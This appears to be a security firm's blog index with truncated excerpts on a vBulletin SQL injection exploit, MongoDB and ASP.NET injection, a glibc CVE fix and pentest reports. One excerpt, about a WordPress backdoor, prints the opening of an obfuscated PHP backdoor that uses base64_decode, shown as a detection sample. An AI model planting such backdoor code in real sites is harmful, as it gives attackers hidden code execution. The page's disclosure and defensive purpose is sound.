vBulletin SQL Injection Exploit in the Wild CVE-2016-6195

vBulletin SQL Injection Exploit is released. On June 18th vBulletin forum pushed a patch for the SQLi injection, which is still working on the number of the website according to our research. If you’re using a version of vBulletin 4 older than 4.2.2, you probably get hacked by the cyber criminal and most probably your […]

Firefox 47.0 Memory Access violation Crash – FIXED

We were working on Firefox browser automation for opening some of the URL for the malware analysis. We used the combination of python and selenium to perform automation and the After few mins, we stumble upon a Firefox crash, which was causing the memory access violation crash as shown in the following image. After few […]

MongoDB security – Injection attacks with php

Before we move on to the MongoDb injections, we must understand what MongoDb exactly is and why we prefer it over other databases. As MongoDb does not use SQL people assumed it is not vulnerable to any kind of injection attacks. But believe me, no one is born with inbuilt security aspects. We have to […]

SecureLayer7 Gratis PenTest Summer 2016

SecureLayer7 Gratis PenTest Summer 2016 You can now receive free penetration testing for 6 days! What is this about? Your open source software project stands a chance to win 6 full days of penetration testing from SecureLayer7, that too free of cost! That’s not possible! I am being forged! The SecureLayer7 PenTest Summer 2016 is […]

Backdoor PHP code WordPress

We have detected a Backdoor PHP code. It is often hidden in the WP writable directory. This backdoor is used to send PHP code execution.   <?php $yeqqdvu = 6110; function neceliemyz($rdcldpm, $oqwvlr) { $efogjgyh = ”; for($i=0; $i < strlen($rdcldpm); $i++){ $efogjgyh .= isset($oqwvlr[$rdcldpm[$i]]) ? $oqwvlr[$rdcldpm[$i]] : $rdcldpm[$i]; } $pgdnvjl=”base64_decode”; return $pgdnvjl($efogjgyh); } $hljnyoyp […]

Everything About Windows Application Phone Penetration Testing – Part 1

Recently, I’ve started working on the Windows application for finding security flaws in the application. When I kick-started the application testing, I didn’t found any good resource for the Windows application penetration testing. So this is the blog for who are looking for getting the start in the windows application penetration. To start with Windows […]

How to fix CVE-2015-7547 glibc: getaddrinfo stack-based buffer overflow

RedHat released Patch for CVE-2015-7547 glibc: getaddrinfo stack-based buffer overflow.  A stack-based buffer overflow was found in the way the libresolv library performed dual A/AAAA DNS queries. A remote attacker could create a specially crafted DNS response which could cause libresolv to crash or, potentially, execute code with the permissions of the user running the library. Note: […]

Protect Against SQL Injection in ASP.Net

The lot of resources are available for SQL Injection attack, however  I will be focusing on the SQL injection protection sample codes in the ASP.net. Wherever, I meet to developers they were absolutely aware of SQL injection. On the hand, they are not aware to fix the SQL injection as per the standard methodology. Before going further, […]

Refinery – The Ruby on Rail Open Source CMS Penetration Testing Report

Recently I got an opportunity to test Refinery CMS, often shortened to Refinery, is an open source content management system written in Ruby as a Ruby on Rails web application with jQuery used as the JavaScript library. Refinery CMS supports Rails 3.2 and Rails 4.2. Refinery differs from similar products by targeting a non-technical end user and allowing the developer to create a flexible website […]